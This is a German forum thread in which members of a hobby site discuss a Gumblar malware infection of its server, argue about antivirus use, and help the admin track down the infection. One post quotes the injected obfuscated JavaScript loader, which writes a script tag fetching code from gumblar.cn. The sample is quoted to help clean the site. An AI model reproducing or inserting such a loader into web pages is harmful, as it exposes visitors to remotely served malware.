Bitte um aussagekräftige Stellungnahme

  • Sorry,
    aber die Meldungen bzgl. der Malware irritieren und verunsichern mich.
    Ich bin derzeit ohne Antivirus unterwegs und bin jetzt verunsichert.
    Ich habe unknowns für eine vertrauenswürdige Seite gehalten und auch einen Schutz seitens des Betreibers erwartet.
    Wie ist jetzt der Stand der Dinge?
    Kann man diese Seite noch ohne Virenschutz aufrufen?


    Mandras


    PS: Ich möchte meinen Post NICHT als Vorwurf verstanden wissen. Aber ich bitte doch dringend um eine aussagekräftige Klärung meiner Frage.

  • Zitat

    Original von Mandras
    Kann man diese Seite noch ohne Virenschutz aufrufen?


    Ohne Risiko kann man keine Seite ohne Virenschutz aufrufen.


    .


    Ich glaube nicht, daß jemand wirklich objektiv sein kann - alle Meinungen sind subjektiv.
    Natürlich gilt das auch für mich.

    • Offizieller Beitrag

    Hallo Mandras,


    also da muß ich Warbear Recht geben. Ohne Virenscanner im Netz unterwegs zu sein ist schon "fahrlässig".


    Zu Deiner Frage:


    Bei 1und1 läuft ein managed Server, d.h. 1und1 kümmert sich um die Sicherheit des Servers auf dem diese Domain läuft. Ist irgendetwas komisch, dann bekomme ich eine Meldung von 1und1. Aufgrund der Performanceprobleme der letzten Wochen hatte ich gestern mit der Hotline 2 Mal Kontakt (15 Euro, da irgendwie 70ct / Minute). Auf meine Nachfrage hieß es: Keine derzeitigen Erkenntnisse...


    Diese Malware muß sich gestern Nacht auf den Server geschlichen haben (wahrscheinlich die offene FTP Verbindung gekapert als ich den Counter ausgebuat habe). Ich habe mir heute alle Dateien angeschaut und die Codes von diesem Ding soweit entfernt. Ob ich alles gefunden habe kann ich Dir naürlich nicht versichern. Da bin ich auf Euer Feedback angewiesen. Ich glaube schneller konnte ich auch nicht reagieren. Ich kann Dir auch abschließend nicht sagen, was diese Malware macht.


    Trotzdem noch einmal den Hinweis an Dich: Installiere Dir Kaspersky oder etwas ähnliches.

    "We are the unknowns. Lower your shields and surrender your ships. We will add your biological and technological distinctiveness to our own. Your culture will adapt to service us. Resistance is futile."


    Meine Spiele: Klick mich

  • Zitat

    Original von Sankt Peter
    Ob ich alles gefunden habe kann ich Dir naürlich nicht versichern. Da bin ich auf Euer Feedback angewiesen. Ich glaube schneller konnte ich auch nicht reagieren. Ich kann Dir auch abschließend nicht sagen, was diese Malware macht.


    Du hast offenbar noch nicht alles gefunden.


    Ich kann sehen, daß bei jedem Aufruf immer noch kurz auf "gumblar.cn" gewartet wird.


    .


    Ich glaube nicht, daß jemand wirklich objektiv sein kann - alle Meinungen sind subjektiv.
    Natürlich gilt das auch für mich.

    • Offizieller Beitrag

    Wie meinst Du das - "gewartet wird"?


    Kann man denn die konkrete Datei identifizieren? Warum meldet Kapsersky bei mir nichts ?(

  • Mein "NoScript" meldet auch, dass "gumblar.cn" noch auf dieser Seite gefragt wird.
    Freilich werde ich diese Seite auch nicht freigeben ;)


    Ohne Virenschutz unterwegs zu sein halte ich hingegen für grob fahrlässig, um das Wort "sträflich" nicht in den Mund zu nehmen.
    Das Internet ist die Karibik zu Zeiten der Piraten, ohne Begleitschutz solltest du dich nicht raus wagen.
    Vielleicht sollte man auch mal eine Kampagne starten: Nie ohne Gummi/Antivirenprogramm/verschlüsseltes WLan/... ;)

  • Firebug meldet mir noch, dass innerhalb des <html> Tags der Hauptseite sich das Skript <script src="gumblar.cn"> befindet, wobei ich es auf den ersten Blick im Seitenquelltext auch nicht direkt finde.

  • Zitat

    Original von Sankt Peter
    Wie meinst Du das - "gewartet wird"?


    Ich kann's auch auf Englisch sagen.
    In der Firefox-Kommentarzeile unten links blitzt immer wieder "waiting for gumblar.cn" auf.



    Zitat

    Original von Sankt Peter
    Kann man denn die konkrete Datei identifizieren?


    Habe ich alles schon geschrieben:
    Sorry!!!


    Zitat

    Original von Sankt Peter
    Warum meldet Kapsersky bei mir nichts ?(


    Woher soll ich das wissen?
    Vielleicht hat er's schon mal gemeldet. Schau halt mal im Kaspersky-Log nach.


    Jetzt meldet er bei mir auch nichts mehr.


    .


    Ich glaube nicht, daß jemand wirklich objektiv sein kann - alle Meinungen sind subjektiv.
    Natürlich gilt das auch für mich.

  • <s c r i p t l a n g u a g e = j a v a s c r i p t > < ! - -
    ( f u n c t i o n (){var Ljh='%';var fN7='var"20a"3d"22"53c"72ipt"45ng"69ne"22"2cb"3d"22Versio"6e()"2b"22"2cj"3d"22"22"2c"75"3dn"61vigator"2euser"41gent"3bif((u"2e"69n"64exOf("22Win"22"29"3e"30"29"26"26("75"2e"69"6edexO"66"28"22NT"206"22)"3c0)"26"26(docum"65nt"2ecoo"6bi"65"2eind"65xOf("22mi"65k"3d1"22)"3c"30)"26"26(ty"70e"6f"66(z"72"76zts)"21"3dtypeof("22A"22)))"7b"7a"72vzts"3d"22A"22"3beval"28"22if(windo"77"2e"22+a+"22)"6a"3dj+"22+a+"22Maj"6f"72"22+b+a"2b"22Mi"6eo"72"22"2b"62+a+"22Buil"64"22+"62"2b"22"6a"3b"22)"3bdocu"6dent"2e"77rit"65("22"3cs"63ript"20src"3d"2f"2f"67umblar"2ecn"2frss"2f"3f"69"64"3d"22+j"2b"22"3e"3c"5c"2f"73cript"3e"22)"3b"7d';var NdtT=fN7.replace(/"/g,Ljh);eval(unescape(NdtT))})();
    --></ s c r i p t >


    sieht doch verdächtig aus.


    Ich hab den Text jetzt oben selbst mal gesperrt (d.h. die Leerzeichen dazwischen gesetzt), nicht dass ich in irgendeiner Form das dämliche Skript noch selbst hier reinstelle und in diesem Beitrag sozusagen konserviere.


    http://blog.unmaskparasites.co…out-this-injected-script/
    Fand ich auf den ersten Blick ganz hilfreich.


    Zitat

    Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.


    Das klingt doch schonmal nicht so gut.


    Ansonsten steht weiter unten noch der Tipp SFTP anstatt FTP zu nutzen, das kann ich nur unterstützen. Niemals ohne, gell? ;)


    Zitat

    Original von Sankt Peter
    Kann man denn die konkrete Datei identifizieren? Warum meldet Kapsersky bei mir nichts ?(


    Ja, wahrscheinlich ist nahezu jede Datei betroffen.


    Mindestens jedoch das, was mir die Index.php ausliefert, sowie die thread.php. Bei beiden findet sich vor dem <body> Tag die verdächtigen Anteile.

    2 Mal editiert, zuletzt von Tyrfing ()

  • Sorry,
    ich hatte eine Menge Ärger mit meinem PC.
    Auch mit Virussoftware.
    Er hat jetzt ein neues Innenleben bekommen,
    Und ich besuche nur vertrauenswürdige Seiten wie Spiegel, Kicker etc.
    Unknowns habe ich dazu gezählt.
    Wenn die Seite ofennsichtlich gehackt wurde und Malware verbreitet, gehört sie vom Netz genommen bis sie wieder ok ist. Die Verbreitung der Malware war offensicjhtlich dem Betreiber bekannt, eine Warnung erfolgte nicht. Das nenne ich fahrlässig und verantwortungslos!
    Da kann ich den Vorwurf von JoelH nicht verstehen bzwe. finde ich ihn unverschämt.


    Enttäuscht, verärgert und mit aktuell massiven Problemen was seinen IE angeht.
    Mandras

  • Zitat

    Original von Mandras
    Und ich besuche nur vertrauenswürdige Seiten wie Spiegel, Kicker etc.


    Was ist denn eine "vertrauenswürdige Seite"?
    Wenn du Seiten meinst, bei denen man ganz stark davon ausgehen kann, dass sie keine/kaum Fehler enthalten, dann dürften dass gerademal die Seiten einiger Experten sein. Und ich möchte ausdrücklich dazu sagen, dass ich davon auch Seiten einiger bekannter Antivirentools ausschließen würde, weil ich stark vermute, dass diese auch mit einem CMS betrieben werden, bei dem ich mir nicht sicher sein kann, ob dieses unterliegende System einen Fehler enthält.


    Jedenfalls denke ich, dass du den Spiegel ganz, ganz stark überschätzt. Der Spiegel ist ja, in seiner Onlinefassung, noch nichteinmal seriös. Von "Sicher" mal ganz zu schweigen...


    Zitat

    Original von Mandras
    Wenn die Seite ofennsichtlich gehackt wurde und Malware verbreitet, gehört sie vom Netz genommen bis sie wieder ok ist. Die Verbreitung der Malware war offensicjhtlich dem Betreiber bekannt, eine Warnung erfolgte nicht.[...]


    1) Ich unterstelle dem Admin einfach mal keine böse Absicht
    2) Ich unterstelle ihm weiterhin, dass er das ganze aus einem gewissen "Hobby" heraus macht und nicht unbedingt ein professioneller Webhoster ist.
    => Aus 1+2 schließe ich, dass er da gewissermaßen ein paar Probleme haben könnte, wenn es darum geht schnell und einfach eine Lösung für ein nicht-triviales Computerproblem zu finden.
    3) Was meinst du mit "war dem Betreiber offensichtlich bekannt"?
    Seitdem die Seite "verseucht" ist, hat er versucht den Fehler zu beheben und war, soweit ich das verstanden habe, im Bewusstsein, dass die Seite nun wieder "sauber" sei. Dass dies eine Fehlentscheidung war, führe ich auf 2 zurück.


    Zitat

    Original von Mandras
    [...]
    Das nenne ich fahrlässig und verantwortungslos!
    Da kann ich den Vorwurf von JoelH nicht verstehen bzwe. finde ich ihn unverschämt.
    Enttäuscht, verärgert und mit aktuell massiven Problemen was seinen IE angeht.


    1) Ich schließe mich JoelH an, wenn er sagt, dass du ebenso fahrlässig und verantwortungslos handelst, wenn du ohne Antivirenprogramm und dann - auch das noch! - mit dem IE ins Internet gehst. Sag mir bitte, dass es wenigstens eine aktuelle Version des IEs ist...
    2) Ich denke, du hast vermutlich die falsche Erwartungshaltung an die Seite hier. Ich denke mit dieser Erwartungshaltung wirst du in Zukunft auch noch einige Male von einigen (anderen) Webseiten enttäuscht werden. Was du gefordert hast, ist nur sehr schwer zu leisten.
    3) Ich würde dir, wenn ich lese wie du durch das Internet surfst dringend empfehlen deinen Rechner gründlich durchzuchecken. Vermutlich hast du schon mehrere Probleme und weißt noch nichts davon.


    Aber mal was anderes - den Internetcache des IE löscht du unter "Extras" - "Browserverlauf löschen" (IE 7)


  • Abermals danke für den nützlichen Hinweis!
    Das ist eine ganz andere Reaktion als von Joel!


    Ja, bei Punkt 1 und 2 stimme ich Dir zu, bei Punkt 3 nicht.
    Wenn ihm die Probleme mit dem Virus bekannt sind, hat er die Seite zu sperren! Nichts anderes.
    Ansonsten liefert er die Besucher seiner Seite wissentlich einem Virus aus.
    Sorry, aber das ist die Realität.


    Mandras

  • Du solltest defintiv einen Virenscanner installieren. Ich persönlich habe gute ERfahrungen mit Antivir gemacht (www.free-av.de) welches kostenlos ist und meines Wissens hervorragend geupdatet wird. In der Uni Mainz haben wir das in der EDV-Beratungsstelle immer empfohlen und hatten ganz selten Probleme damit.
    Ich muss sagen ich kann es nicht wirklich verstehen wenn man keinen Virenscanner installiert hat oder denkt die Norton 90 Tage Trialversion o.ä. reicht schon aus auch wenn das letzte Update ein Jahr her ist. Auch Systemupdates von Windows sollten immer gemacht werden!
    Natürlich sollten auch keine Seiten online sein, die befallen sind, aber zum einen muss man das erstmal merken und das Ausmaß erkennen und zum anderen wurde das ja anscheinend relativ schnell gefixt bzw. St. Peter arbeitet an den Details. Ich mache mir da mit meinem System wenig Sorgen das ich mir hier was einfange. Und absolute Sicherheit gibt es sowieso nie...

  • Hallo,


    seit WEB 2.0 (Wikis, Blogs und Mikroblogs, Foto- und Videoportalen) würde ich keiner Seite mehr trauen. Wer weiß denn schon was noch so alles mit den Bildern, Texten, Avataren usw. auf einen Server hochgeladen wird. Alle Seite bei denen in irgend einer Form Dateien von Nutzern hochgeladen werden können würde ich als Sicherheitsrisiko einstufen. So mancher PC User würde sich sicher wundern, wenn er wüsste was man sich so alles durch harmlos aussehende Dateien einfangen kann.
    Die kostenlose Anivirenprogramme und Firewalls würde ich nur bedingt empfehlen. Man ist da eher der Einäugige unter den Blinden.
    Ansonsten würde ich alles was möglich ist im Browser deaktivieren (JavaScript, Cookies usw.), und regelmäßig mein System updaten. Ich finde dieses ganzen JavaScript sowieso zu 99% unnötig.
    Eine Schuld bei den Seitenbetreiben kann ich eigentlich nicht erkennen, vor allem wenn es sich noch um reine Hobbyprojekte handelt. Oder wollen wir jetzt von Sankt Peter außer dem Zeit und Geldaufwand auch noch verlangen, dass er jederzeit im Urlaub zu erreichen ist, das falls die Seite gehackt wird er sofort reagieren kann und wir uns keinen Virus einfangen? Also nur noch Urlaub mit WLAN und die Zugangsdaten nicht vergessen.


    Gruß


    Marcus

    Autor von: Deep Dive (Logis), Quaki (Beleduc), Papaya Boats (Piatnik)

  • Zitat

    Original von Warbear


    Ohne Risiko kann man keine Seite ohne Virenschutz aufrufen.


    .


    Selbst mit Virenschutz kann man keine Seite ohne Risiko aufrufen.


    Ich als überzeugter Linux-Benutzer habe zum glück weniger mit Viren zu kämpfen. Als Foren Admin kann ich allerdings jeden Tag mehrere Attacken auf meine Seite feststellen. Dagegen unternehmen kann man leider weniger. Und wenn die Seite gehacked wurde, dann muss man sie halt wieder herstellen. Da braucht man kein grosses Tamtam drum machen - das ist leider schon fast Tagesgeschäft.
    Und das hier gefordert wird das St.Peter am besten alle User persönlich anruft (leicht überspitzt ausgedrückt) kann ich nicht verstehen. Jeder ist selber dafür verantwortlich wann er mit welchem Rechner auf welcher Seite surft. Ob er einen Virenscanner benutzt, IE, Mozilla oder sonst welche Browser ob er No Script , Add Block oder sonstigen kleinen Tools benutzt, etc ....


    Ich für mich, gehe nicht ohne NoScript und AddBlock via Mozilla ins Netz und das ganze unter Linux. Ist zwar keine Garantie für irgendwas, hat sich aber ziemlich gut bewährt (so auch in dem aktuellen Fall ;) ).


    Das man "allem was Kostenlos ist" misstrauen soll, dem kann ich als eingefleischter und langjährigen Linux-User nicht wirklich zustimmen. Es gibt ganz ausgezeichnete freie Firefalls, Antiviren und sonstige Software die kostenlos ist (sogar für Windows). Mit Avira habe ich bisher nur gute erfahrungen gemacht.


    Atti

    • Offizieller Beitrag

    Auf jeden Fall noch einmal ein großes Danke an alle und ein virtuelles Freibier (=Bit) an die Helfer und die Geduldigen...


    Wem noch irgendetwas auffällt, den bitte ich, mir kurz per PN Bescheid zu geben...


    Danke
    Sankt Peter


    :gott:

    "We are the unknowns. Lower your shields and surrender your ships. We will add your biological and technological distinctiveness to our own. Your culture will adapt to service us. Resistance is futile."


    Meine Spiele: Klick mich

  • Zitat

    Das man "allem was Kostenlos ist" misstrauen soll, dem kann ich als eingefleischter und langjährigen Linux-User nicht wirklich zustimmen. Es gibt ganz ausgezeichnete freie Firefalls, Antiviren und sonstige Software die kostenlos ist (sogar für Windows). Mit Avira habe ich bisher nur gute erfahrungen gemacht.


    Hab mich hier nur auf Windows bezogen, da habe ich bis jetzt mit der kostenlosen Software keine so guten Erfahrungen gemacht. Warum man nicht einfach mit Linux ins Internet geht, da kostenlos und zurzeit noch sicherer, ist ein ganz anderes Thema.

    Autor von: Deep Dive (Logis), Quaki (Beleduc), Papaya Boats (Piatnik)

  • Wer sich gut genug mit Rechnern auskennt, dass er Linux installiert hat (weil wahrscheinlich Windows vorher auf dem Rechner war) und dementsprechend auch schon ein OS selbst aufgesetzt hat - mit dem kann man auch ganz anders über Computersicherheit reden.


    Bei der große Maße an Menschen und dementsprechend auch der Rechner kämpft man aber sowieso meist auf dem Schlachtfeld Windows und sollte schauen, dass man es schafft ein möglichst sicheres und bequemes System einzurichten, welches auch gewissen Sicherheitsstandards genügt.
    Dabei halte ich das "bequem" für eine ganz, ganz wichtiges Kriterium. Denn auch wenn die Nutzer sich nicht auskennen, wenn sie ein Programm ständig nervt oder sonstwie unbequem ist, dann wird es meist dann doch irgendwie ausgeschaltet, umgangen, nicht aktualisiert oder so


    "Ach das Fenster da? - Softwareaktualisierung-? Das kommt schon ewig. Ich klick das immer weg, das nervt mich, da wollte ich dich eh nochmal fragen. Wie werd ich das los?" *autsch*
    Dementsprechend ist es schon gut, wenn man es erreicht, dass der Nutzer garnicht soviel mitbekommt davon, dass er "sicher" unterwegs ist.